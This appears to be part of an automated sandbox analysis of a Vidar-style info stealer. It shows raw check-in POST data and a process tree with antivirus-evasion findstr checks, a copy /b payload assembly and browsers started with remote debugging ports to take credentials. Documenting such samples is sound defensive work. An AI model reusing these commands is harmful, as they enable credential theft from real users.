                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7YCBIE37YCBAIEC26FCBCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:55 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                  Start time:00:23:07
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\trZG6pItZj.exe"
                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                  File size:1'146'198 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:1B31C291993985499CF544CC549E9028
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                  Start time:00:23:08
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                  Start time:00:23:08
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                                  Start time:00:23:10
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                                  Imagebase:0xeb0000
                                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                                  Start time:00:23:10
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                  Imagebase:0x50000
                                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                                  Start time:00:23:10
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                                  Imagebase:0xeb0000
                                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                  Start time:00:23:10
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                  Imagebase:0x50000
                                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                                  Start time:00:23:11
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:cmd /c md 139308
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                                  Start time:00:23:11
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:findstr /V "Frame" Ron
                                                                                                                                                                                                                                                                                                  Imagebase:0x50000
                                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                                                  Start time:00:23:11
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting j
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                                  Start time:00:23:11
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:Procedures.com j
                                                                                                                                                                                                                                                                                                  Imagebase:0xe20000
                                                                                                                                                                                                                                                                                                  File size:947'288 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                  Start time:00:23:11
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                                  Imagebase:0x800000
                                                                                                                                                                                                                                                                                                  File size:28'160 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                                                  Start time:00:23:53
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                                                  Start time:00:23:54
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2356,i,7400359050630250975,17873444057706261600,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                                  Start time:00:24:07
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                                  Start time:00:24:08
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2592 --field-trial-handle=2492,i,16554835861634890053,15790992392374855556,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                                                  Start time:00:24:08
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                                                  Start time:00:24:08
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2052,i,14059903290940015210,10677024805754499588,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                                                  Start time:00:24:18
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                                                                  Start time:00:24:19
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                                                  Start time:00:24:19
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2372,i,14569064523681728109,8577273085743409208,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                                                  Start time:00:24:20
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2744 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                                                                  Start time:00:24:26
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6748 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                                                  Start time:00:24:26
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Has exited:true

